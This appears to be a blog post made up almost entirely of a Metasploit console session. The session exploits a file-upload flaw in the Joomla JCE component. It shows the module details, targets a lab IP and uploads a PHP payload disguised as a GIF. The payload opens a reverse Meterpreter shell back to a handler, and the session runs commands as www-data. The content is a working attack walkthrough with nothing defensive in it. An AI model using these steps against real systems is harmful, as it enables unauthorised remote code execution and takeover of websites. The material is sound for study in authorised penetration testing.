________________________________________________________
msf > use exploit/unix/webapp/joomla_comjce_imgmanager
msf exploit(joomla_comjce_imgmanager) > info
Name: Joomla Component JCE File Upload Remote Code Execution
Module: exploit/unix/webapp/joomla_comjce_imgmanager
Version: 0
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
Unknown
Heyder Andrade
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
TARGETURI / yes Joomla directory path
VHOST no HTTP server virtual host
Payload information:
Space: 4000
Avoid: 1 characters
Description:
This module exploits a vulnerability in the JCE component for
Joomla!, which could allow an unauthenticated remote attacker to
upload arbitrary files, caused by the fails to sufficiently sanitize
user-supplied input. Sending specially-crafted HTTP request, a
remote attacker could exploit this vulnerability to upload a
malicious PHP script, which could allow the attacker to execute
arbitrary PHP code on the vulnerable system. This module has been
tested successfully on the JCE Editor 1.5.71 and Joomla 1.5.26.
References:
http://www.securityfocus.com/bid/49338
http://www.exploit-db.com/exploits/17734
msf exploit(joomla_comjce_imgmanager) > set RHOST 172.16.86.133
RHOST => 172.16.86.133
msf exploit(joomla_comjce_imgmanager) > exploit
[*] Started reverse handler on 172.16.86.1:4444
[*] Checking component version to 172.16.86.133:80
[+] Successfully uploaded cpizwa.gif
[*] Change Extension from cpizwa.gif to cpizwa.php
[+] Renamed cpizwa.gif to cpizwa.php
[*] Calling payload: cpizwa.php
[*] Sending stage (39217 bytes) to 172.16.86.133
[*] Meterpreter session 1 opened (172.16.86.1:4444 -> 172.16.86.133:60773) at Wed Mar 27 22:14:31 -0300 2013
[+] Deleted cpizwa.php
meterpreter > getuid
Server username: www-data (33)
meterpreter > shell
Process 7445 created.
Channel 0 created.
pwd
/var/www/joomla/images/stories
^C
Terminate channel 0? [y/N] y
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 172.16.86.133 - Meterpreter session 1 closed. Reason: User exit
msf exploit(joomla_comjce_imgmanager) >
___________________________________________________________
Nenhum comentário:
Postar um comentário